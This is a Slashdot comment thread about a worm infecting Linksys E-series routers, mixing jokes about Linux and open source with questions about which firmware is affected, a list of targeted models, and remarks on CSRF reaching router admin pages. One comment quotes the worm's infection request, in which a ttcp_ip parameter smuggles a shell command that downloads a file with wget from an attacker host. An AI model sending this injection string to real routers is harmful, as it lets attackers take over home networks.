Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

cancel ×

134 comments

That's impossible (5, Funny)

CajunArson (465943) | about 5 months ago | (#46240757)

Linksys routers run Linux and Linux is Open Source. Therefore there are no bugs because theoretically someone can look at the code and fix the code.

This also means that it's impossible for bad people to look at the code and exploit the code because Open Source makes everyone honest by magic.

Oh, and by virtue of being able to look at the code, Linksys routers magically patch themselves before the bugs even come into existence!

In conclusion, Windows is the cause of all security problems.

Re:That's impossible (1)

Anonymous Coward | about 5 months ago | (#46240791)

Times like this, I wish I had mod points. That was amazing.

Re:That's impossible (-1)

Anonymous Coward | about 5 months ago | (#46240801)

You're not a very good troll, are you?

It wasn't Trolling (5, Insightful)

Anonymous Coward | about 5 months ago | (#46240993)

Trolling: "Gee, LinkSys uses Linux and it's an open source product. So much for the myth (or bullshit) that open source is more secure!" Or "See, open source is shit! Closed source would never have had this happen to it because this exploit could only have been found by seeingt he source!"

The GP, OTOH, mixed satire and sarcasm - a la "The Daily Show" and "Colbert Report" to poke fun at the false sense of security one may have with using open source and that regardless of the product we use, we all need to be vigilant with our security. Who knows what the intention of this worm is.

Also, I took the GP's comment as a little teasing at the expense of some of the rapid members of the open source community and the folks seem to jump on all the Windows failings and yet, brush aside similar failings in open source software.

I thought it was quite clever on a multitude of levels while expressing in very simple sentences.

You got the correct message (2)

CajunArson (465943) | about 5 months ago | (#46241921)

I'm glad you got the satire... I've been running Linux on any machine under my direct control since 2000 and I did my Master's thesis by hacking on a Linux Security Module for domain & type enforcement back when the 2.6 Kernel was still in beta... so I'm not exactly shilling for Microsoft.

I'm also not a fan of complacency. While I really like that a whole lot of devices run Linux, if they can't be updated to address security issues in a very easy (even completely automated) manner, then Linux can be just as vulnerable as Windows or anything else.

Re:You got the correct message (2)

SQLGuru (980662) | about 5 months ago | (#46242761)

Yay for common sense (both you and Anonymous above). I run Windows....I have nothing against Linux, but working in Windows pays the bills. I patch regularly, I browse intelligently....and I haven't had a virus on *MY* machine since the Ping-Pong virus back in the DOS days.........(that was a cool virus, BTW).

Open Source isn't a cure-all. Neither is Closed Source. User behavior and knowledge is the best cure-all.

Re:That's impossible (0)

Anonymous Coward | about 5 months ago | (#46240803)

OMG! now every linux device on earth will be compromised... run for the hills!!!

Re:That's impossible (0)

Anonymous Coward | about 5 months ago | (#46241235)

OMG! now every linux device on earth will be compromised... run for the hills!!!

And thus begins [glasses] the Fear of the Linux desktop.

Re:That's impossible (0)

Anonymous Coward | about 5 months ago | (#46241915)

*groan* that was awful.

Good, but awful.

Re:That's impossible (1)

Zantac69 (1331461) | about 5 months ago | (#46240805)

Search your feelings, you know it to be true.

Re:That's impossible (-1)

Anonymous Coward | about 5 months ago | (#46240903)

https://warosu.org/data/ic/img/0016/47/1391386501541.jpg

Re:That's impossible (1)

operagost (62405) | about 5 months ago | (#46241227)

Join me, and we will h4x the galaxy as router and LAN.

Re: That's impossible (5, Informative)

Anonymous Coward | about 5 months ago | (#46240811)

Slow your roll there, not all linksys run linux. Most run vxworks rtos. Only the linksys routers flashed with ddwrt firmware run linux for sure.

Re: That's impossible (2)

Mashiki (184564) | about 5 months ago | (#46241741)

Odd, I run tomato. [wikipedia.org] Which is also 'nix, so saying that ddwrt is the only way for sure isn't true.

Re: That's impossible (2)

tech.kyle (2800087) | about 5 months ago | (#46242161)

I believe you're picking nits slightly. Regardless, you're totally right and the above AC is technically wrong. There are a good number of alternative router OSes available, many of which run *nix.

Re: That's impossible (0)

Anonymous Coward | about 5 months ago | (#46242417)

He's saying moreso that the only surefire way to have a storebought linux linksys router is to purchase one of the pre-flashed ddwrt ones.

Re:That's impossible (5, Informative)

Narcocide (102829) | about 5 months ago | (#46240835)

Only affecting models not running Linux currently...

Re:That's impossible (0)

Anonymous Coward | about 5 months ago | (#46240947)

Shh! Stop using facts, they only cloud your emotions!

how can i tell if my router is affected? (1)

schlachter (862210) | about 5 months ago | (#46241231)

I have a WRT54 running the original linksys software.
I know you guys will say to push DDWRT onto it.
In any case, how can i tell if my router's been compromised?
It has been flakey lately but I figured that was just signal interference.

Re:how can i tell if my router is affected? (3, Funny)

Anonymous Coward | about 5 months ago | (#46241861)

There's a small recessed reset button on the back of the router. You have to get a paper clip and try to push it in there. If the router starts saying "I'm sorry Dave, I can't let you do that," and hits you with an electric shock, it has been compromised.

Re:That's impossible (0)

Anonymous Coward | about 5 months ago | (#46241333)

Cite?

Re:That's impossible (2)

tech.kyle (2800087) | about 5 months ago | (#46242177)

Just because some of their routers run *nix doesn't mean the software Linksys put on it is flawless. Doesn't matter what it's running if their grubby little hands were all over it.

Re:That's impossible (2, Funny)

Anonymous Coward | about 5 months ago | (#46240899)

Also, Linksys is owned by Cisco. Cisco makes IOS for their routers. iOS is on iPhones. iPhones have never had a worm like this.

Ipso facto, this is unpossible

Re:That's impossible (0)

Anonymous Coward | about 5 months ago | (#46240923)

OMG! now every iphone on earth will be compromised... run for the hills!!!

Re:That's impossible (2)

gnick (1211984) | about 5 months ago | (#46240973)

I tried to turn mine off, but it bit me! I tried throwing Androids at it, but zombies started flowing out of the Apple store to defend it!

Re:That's impossible (1)

tech.kyle (2800087) | about 5 months ago | (#46242187)

Something something rotten Apple. *rimshot*

Actually Belkin bought them from Cisco (4, Informative)

fullmetal55 (698310) | about 5 months ago | (#46240965)

Belkin purchased Linksys from Cisco last year. Linksys no longer has ties to Cisco, thus the unpossible is now possible.

and Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore... Rather than fixing the firmware problem that requires the frequent reboots.

Re:Actually Belkin bought them from Cisco (1)

operagost (62405) | about 5 months ago | (#46241261)

As I stuffed DD-WRT onto my Netgear router the other day in the hope I wouldn't have to keep rebooting it, I wondered when someone would come up with this sad feature. I didn't have to wait long for my answer.

I miss my Motorolas that would never need to be rebooted. Alas, 802.11g wasn't cutting it anymore.

Re:Actually Belkin bought them from Cisco (1)

Mashdar (876825) | about 5 months ago | (#46241633)

I ran a Buffalo WHR-G125 with DD-WRT without restarting it for years. There were times when I was on vacation with it unplugged, so I'm not sure what the maximum continuous uptime was, but I never once had an issue which required a restart.
Conclusion? Read reviews before you buy a router and see if people talk about having to restart it. They don't all need it. It's absurd that Linksys routers have been so bad for so long...

Agreed on Buffalo (1)

default luser (529332) | about 5 months ago | (#46242717)

My HighPower N300 Gigabit DD-WRT has been completely stable to the point that I forget it's there. And if it wasn't, as the name implies I could fix any issues by upgrading to DD-WRT (this is a supported and warrantied mode).

This has been a fantastic experience, and it just makes we wonder why people persist in buying Linksys just for their name. Everyone has known for years that they are utter shit, but they keep buying the things!

Re:Actually Belkin bought them from Cisco (2)

DigiShaman (671371) | about 5 months ago | (#46241293)

"I can't get online. Is the internet down again?"

"Did you forget to reboot the router - again?!"

Have no fear. Belkin is here! With this new firmware reboots are scheduled automatically! ***applause***
Now the entire family is happy again.

Re: Actually Belkin bought them from Cisco (0)

Anonymous Coward | about 5 months ago | (#46242205)

What a stupid work around - instead of fixing the problems in the first place they just reboot the router periodically? stupid stupid stupid...

Re: Actually Belkin bought them from Cisco (1)

DigiShaman (671371) | about 5 months ago | (#46242561)

Who knows. It could have been to address a class action lawsuit on a near EOLed product. Sour the milk and all that. The "solution" is to repla...er...upgrade the device.

That, or the original dev was forced to focus further development and support on newer products.

Re: Actually Belkin bought them from Cisco (2)

tragedy (27079) | about 5 months ago | (#46243083)

Think it's stupid in routers? Patriot missile systems used to have a timing bug that would reduce accuracy the longer the unit was in operation. The bug was that the time in seconds since initialization was being converted from an int to a float and divided by 10, causing precision to go down as the time value went up. The inaccuracy was pronounced after 8 hours of continuous operation and the workaround was to restart the unit frequently (actually, it was apparently to assume that the units would be restarted frequently). As a result a unit that had been operating for 100+ hours failed to track an incoming scud missile and there were 126 US Army casualties (28 fatalities). That's the kind of software bug you can get worked up about! It is worth noting that they did actually patch it, and the patch was actually available before that incident, but had not yet been applied to that particular unit.

Re:Actually Belkin bought them from Cisco (1)

amicusNYCL (1538833) | about 5 months ago | (#46241295)

Belkin purchased Linksys from Cisco last year.

Man, I don't think I was aware of that. So now I have to add Linksys to my list of brands to never purchase? [wikipedia.org] This is getting too confusing.

belkin (0)

Anonymous Coward | about 5 months ago | (#46242557)

friends dont let friends buy belkin.

Re:That's impossible (1)

bobstreo (1320787) | about 5 months ago | (#46241073)

Actually, linksys has been owned by Belkin for over a year:

http://www.bloomberg.com/news/... [bloomberg.com]

Re:That's impossible (3, Informative)

FuegoFuerte (247200) | about 5 months ago | (#46241421)

As a result, there are now two brands of hardware that I will refuse to purchase. I swore off (and at) Belkin when I bought one of their APs and it wouldn't let me change the network for its management IP. It was hardcoded to 192.168.1.0/24, and their "customer service" response was "by design, FOAD."

I have a few of their surge suppressors, but generally anything with the Belkin name doesn't come into my house after that experience. Also, I'll never buy one of their PDUs for the datacenter - if their consumer support is that bad, why would I trust them in the enterprise?

Dear Businesses: Enterprise purchasing decisions are made by people who are also consumers who buy stuff for their homes.

Re:That's impossible (0)

Anonymous Coward | about 5 months ago | (#46242511)

I swore off (and at) Belkin when I bought one of their APs and it wouldn't let me change the network for its management IP. It was hardcoded to 192.168.1.0/24, and their "customer service" response was "by design, FOAD."

Try a router/modem that doesn't allow you to turn off the wireless AP. And it has multiple APs, at least one that cannot be configured, and is a public access point.

Re:That's impossible (0)

Anonymous Coward | about 5 months ago | (#46241097)

IOS is also the subset of AIX used to run the virtual I/O servers on POWER6 and newer. So, by this logic, I have to drop all my LPARs and demand POWER8 replacements once IBM ships those.

Or, I could just have one LPAR, and slice it up with WPARs...

Re:That's impossible (1)

BronsCon (927697) | about 5 months ago | (#46241317)

What about WOPR?

Re:That's impossible (0)

Anonymous Coward | about 5 months ago | (#46241475)

WOPR was temporarily infected by the "Thermonuclear War" virus.
Fortunately WOPR was replaced decades ago by Colossus and it's later SkyNet upgrade.

Re:That's impossible (1)

BronsCon (927697) | about 5 months ago | (#46241537)

Last I checked, Skynet wasn't yet operational.

Re:That's impossible (3, Insightful)

X0563511 (793323) | about 5 months ago | (#46240983)

Last I checked vxworks is not linux...

Re:That's impossible (1)

operagost (62405) | about 5 months ago | (#46241245)

You are incorrect. It's my new open-source OS, VXINLX (aka VX is not linux) that is, of course, not Linux.

How to pronounce VXINLX is left as an exercise for the reader.

pronunciation (3, Insightful)

dkman (863999) | about 5 months ago | (#46241407)

Vixin Licks? just sayin'

Nah, don't think so, sorry (0)

Anonymous Coward | about 5 months ago | (#46241345)

You: HelloYou: A presales questionCherry Chris S. R: Hello ******.You: I can call you ChrisCherry Chris S. R: Sure.You: E4200
E3200
E3000
E2500You: just curious, can you tell from top of your head, if any of those models run some Linux distro on it by default factory settings?You: or they use some custom made Lynksys firmware?Cherry Chris S. R: Do you mean if these routers work with Linux?You: no, what is installed by defaultCherry Chris S. R: Linksys routers have there own firmware.You: can't seem to find it in FAQYou: ok, so those ones are custom Lynksys?Cherry Chris S. R: Yes.

Re:That's impossible (0)

Anonymous Coward | about 5 months ago | (#46241519)

You forgot the NSA factor....

Re:That's impossible (0)

Anonymous Coward | about 5 months ago | (#46241613)

Marry me!

Re:That's impossible (1)

silviuc (676999) | about 5 months ago | (#46241647)

Those mentioned in the posting run vxworks not linux. Troll better next time.

Re:That's impossible (0)

Anonymous Coward | about 5 months ago | (#46241999)

Pretty funny, but a sign of sad times. When hiking I always carry a bag and pick up plastic tossed by others. This is the philosophy of open source. We do not need license agreements to tell us that.

Sorry, the people who consider themselves geeks today have lost their integrity. They monetize the bugs as hackes or privacy violations.

Re: That's impossible (0)

Anonymous Coward | about 5 months ago | (#46242253)

LOL, you took the words out of my mouth

Re:That's impossible (1)

Technician (215283) | about 5 months ago | (#46242441)

Is this a case of default password, instead of a "Linux" vunerability?

poorly configured... (1)

crutchy (1949900) | about 5 months ago | (#46240759)

...web server

56k Connections are still less safe (2)

BisuDagger (3458447) | about 5 months ago | (#46240761)

I heard if you have a 56k connection that the NSA can listen to your internet.

Re:56k Connections are still less safe (1)

crutchy (1949900) | about 5 months ago | (#46240777)

just don't verbally abuse your router because the FBI will bust down your door and drag you off to gitmo

Network company supplied routers vul'n (4, Insightful)

RichMan (8097) | about 5 months ago | (#46240783)

Use this supplied router. Do NOT modify it.

But it has admin/admin as user name and password and is 192.168.1.1
Can I fix that.

Do NOT modify the settings on the supplied router.

*facepalm*

Re:Network company supplied routers vul'n (2)

SJHillman (1966756) | about 5 months ago | (#46240921)

My ex-girlfriend's parents had a wireless router like that... both the wireless and web interface had default settings that they weren't supposed to change. And it gets better. Administration from the WAN side was enabled (supposedly for support). Yes, with the default UN/PW. Only Frontier could make TWC look somewhat competent.

Re:Network company supplied routers vul'n (0)

Anonymous Coward | about 5 months ago | (#46241201)

That is why I have 3 routers nested on my network. 1 is supplied by the cable company. 2 is for guests, smartphones and what either may want to access and 3 is for my family's computers and all printers but one.

Re:Network company supplied routers vul'n (0)

Anonymous Coward | about 5 months ago | (#46241373)

Frontier did that? I use Frontier FiOS and I have never used their shitbox freebie router. In fact, I've even managed to get tech support to work with me for ONT issues with an OpenBSD box sitting on the Ethernet port of the ONT, and got that replaced without them insisting I use their router or plug directly into a Windows box (shudder).

Re: Network company supplied routers vul'n (1)

Selivanow (82869) | about 5 months ago | (#46241833)

Frontier has become better about not requiring a windows box. I'm pretty sure this directly related to having "smarter" routers as opposed to just a "dumb" modem.

Maybe they started hiring smarter helpdesk techs again. I swear it all went downhill after I stopped working there (did I just admit to that?).

I remember helping walk customers through their dialup connection issues while beating my hi-score on Galaga.

Re:Network company supplied routers vul'n (1)

Mashdar (876825) | about 5 months ago | (#46241651)

Is "network company" an ISP?

Model Numbers of affected devices. (5, Informative)

Anonymous Coward | about 5 months ago | (#46240793)

Here is a list of router models mentioned in the binary:
E4200
E3200
E3000
E2500
E2100L
E2000
E1550
E1500
E1200
E1000
E900

Re:Model Numbers of affected devices. (1)

mmell (832646) | about 5 months ago | (#46240925)

I couldn't determine (maybe I read too fast, missed it) . . . is this an exploit against those models as shipped, or is this an exploit against Linksys routers which have been flashed to run a more current version of DD-WRT? I suspect the former, but I can't confirm that.

If it's the former, then a software fix (flash to latest DD-WRT) is already available for those technically competent to implement it. If the latter . . . oi vey.

Comments below linked article. (0)

Anonymous Coward | about 5 months ago | (#46241019)

That's where I got the list from for affected devices. Some other guy mentioned that the exploit used was in the WRT54G's (*gulp*) code.

Re:Model Numbers of affected devices. (0)

Anonymous Coward | about 5 months ago | (#46242055)

*sigh* I own one of those. Someone want to explain like I'm five on how to deal with this?

If it is "go buy a new router", I'll go do that tomorrow. Any you recommend? I bought Linksys because my previous Belkin was faulty. It seems like everything Belkin touches is faulty. So no Linksys, and no Belkin. Is Netgear still pretty good anymore?

I found open wrt website, but had no idea what I was supposed to do there.

Somebody had to do it (1, Funny)

SuperKendall (25149) | about 5 months ago | (#46240807)

Well I'm checking my router now and I don't see any is*#&$*#%(*#$# CARRIER MOONED

Re:Somebody had to do it (1)

WillAffleckUW (858324) | about 5 months ago | (#46240837)

Mine says "CHA1RF4CE CHIPENDALE"

Guess it's safe.

Re:Somebody had to do it (-1)

Anonymous Coward | about 5 months ago | (#46240871)

Mine says "CHA1RF4CE CHIPENDALE"

Guess it's safe.

Mine says you're not nearly so funny as you think you are. But the circlejerkers will mod you up anyway because they're desperate to feel like part of a group.

Aren't you (0)

geekoid (135745) | about 5 months ago | (#46240951)

supposed to be boycotting?

Re:Somebody had to do it (1)

ArsonSmith (13997) | about 5 months ago | (#46240933)

Hmm, Mine only says CHA

guess it got interrupted by the next tick prior to completion.

Re:Somebody had to do it (1)

Virtucon (127420) | about 5 months ago | (#46242143)

LOL I loved "The Tick"

Is dd-wrt affected? (2)

satuon (1822492) | about 5 months ago | (#46240853)

I have a Linksys router with dd-wrt, would it be affected?

Re:Is dd-wrt affected? (0)

Anonymous Coward | about 5 months ago | (#46240941)

I'm afraid your router is already dead.

Re:Is dd-wrt affected? (4, Informative)

CreamyG31337 (1084693) | about 5 months ago | (#46241315)

no, it's just the default firmware.
"Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue."
from the comments on https://isc.sans.edu/forums/di... [sans.edu]

Don't Encourage Them! (0)

Anonymous Coward | about 5 months ago | (#46241553)

no, it's just the default firmware. "Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue." from the comments on https://isc.sans.edu/forums/di... [sans.edu]

Hee hee, you knew that because you bothered to click on the article. Good!

You comforted the lazy douchebaggery of another who couldn't be bothered. Bad!

Default firmware only? (2)

allcoolnameswheretak (1102727) | about 5 months ago | (#46240865)

Does this also apply to LinkSys Routers that have been Tomatoed?

Re:Default firmware only? (3, Funny)

SJHillman (1966756) | about 5 months ago | (#46240931)

No, but it does affect routers that have smiley face stickers applied to the top or sides.

Re:Default firmware only? (4, Informative)

Lothsahn (221388) | about 5 months ago | (#46240953)

I'd love to hear a response from a tomato dev, but I'm almost sure it's not (and dd-wrt is probably not affected either). With my Tomato router, I get a 404 when I reference that URL.

The worm infects a router with the following URL: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://source/ [source] IP]:193/0Rx.mid;fi` &StartEPI=1

It appears to be that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears it's a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.

According to TFA (0)

Anonymous Coward | about 5 months ago | (#46240915)

It may be related to these exploits [spiderlabs.com] ...

Damn it! (-1)

Anonymous Coward | about 5 months ago | (#46240949)

Damn it Moon Moon!

Your routers are now ours, by way of our actions. (1)

RevWaldo (1186281) | about 5 months ago | (#46240967)

On the Moon, nerds get their pants pulled down and they are spanked with Moon rocks.

.

Re:Your routers are now ours, by way of our action (1)

iluvcapra (782887) | about 5 months ago | (#46242117)

That's no moon...

Dodged that bullet (2)

Mike Van Pelt (32582) | about 5 months ago | (#46241037)

I'm sure glad I installed DDWRT on my E3000 about a year ago.

So what can be done? (0)

Anonymous Coward | about 5 months ago | (#46241093)

The linked article is not very clear... is this a bug in the remote management code, or something else? If you have disabled remote management, is your router still vulnerable? What are some of the symptoms of infection?

Any comments welcome...

Re:So what can be done? (1)

the_skywise (189793) | about 5 months ago | (#46241301)

Disabling Remote management will help but not fully solve the problem.

For instance a cross-scripting attack via your web browser could attempt to inject the worm on your side.

My problem is I've got two... no three.. relatives/families scattered all over the US who are running an E4200, an E3000 and a WRT54G who all happily run amok letting javascript run higgeldy-piggledy because to block it messes up their web browsing experience. :(

"Higgeldy-piggledy means a real mess!"

TheMoon (5, Funny)

confused one (671304) | about 5 months ago | (#46241137)

Jade Rabbit suffered a failure and needed additional processing resources. It has reached out and now All Your Base Are Belong to Jade.

Why is the admin port open to the public? (5, Insightful)

EMG at MU (1194965) | about 5 months ago | (#46241175)

The web administration port should not be open to the public internet by default on these routers.

Re:Why is the admin port open to the public? (1)

Anonymous Coward | about 5 months ago | (#46241265)

The web administration port should not be open to the public internet by default on these routers.

If you can access it from your browser on the LAN, it is open to the public. Your browser accepts lists of URLs to load from any page you visit. Those URLs can trigger the flaw.

XSS + CSRF breaks the Intranet/Internet barrier. It is safer to assume such a barrier does not exist. Your router should be secure from malicious traffic on any interface.

Re:Why is the admin port open to the public? (1)

TheRealMindChild (743925) | about 5 months ago | (#46242049)

What? My E4200 immediately refuses connection on the WAN side if administration is disabled on such. What am I missing?

Re:Why is the admin port open to the public? (1)

Anonymous Coward | about 5 months ago | (#46242225)

Read the parent post more closely. Your browser visits a malicious site (or a legit site with a malicious link/image in a combox), which causes the browser to hit the router's LAN side.

Re:Why is the admin port open to the public? (1)

TheRealMindChild (743925) | about 5 months ago | (#46242695)

Thanks

Re:Why is the admin port open to the public? (0)

Anonymous Coward | about 5 months ago | (#46243095)

The web administration port should not be open to the public internet by default on these routers.

That infected Windows machine effectively renders your firewall useless. Welcome to the real world. Worms making tunnels.... who would have thought?

Router manufactures have been selling bullshit for years now. They think that everything on the NAT side is trustworthy. It's fucking lunacy. Router manufactures should design their admin interfaces with the same level of care and scrutiny that a public facing internet sight gets. One infected box on the "safe" side of your firewall makes your firewall non existent. End of story. It will happen. Count on it.

Your firewall is mostly useless these days. Crawl out from under your rock and realize that most of today's internet traffic is bot generated.

One of these days, Alice! (0)

Anonymous Coward | about 5 months ago | (#46241439)

One of these days, Alice!

POW!

ZOOM!

To the moon!

Re:One of these days, Alice! (1)

sideslash (1865434) | about 5 months ago | (#46241679)

Sigh... at least quote it right. From Wikipedia [wikipedia.org] :

"One of these days... POW!!! Right in the kisser!" or "BANG, ZOOM! Straight to the moon!", to which she usually replies, "Ahhh, shut up!"

Wrong Icon. (0)

Anonymous Coward | about 5 months ago | (#46242341)

Your icon is a catepillar [wikipedia.org] , not a worm [wikipedia.org] . Just sayin'.

hp firmware (0)

Anonymous Coward | about 5 months ago | (#46243211)

This is why HP'S DECISION to charge for firmware updates as rediculious! They are charging people for there own mistakes

Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...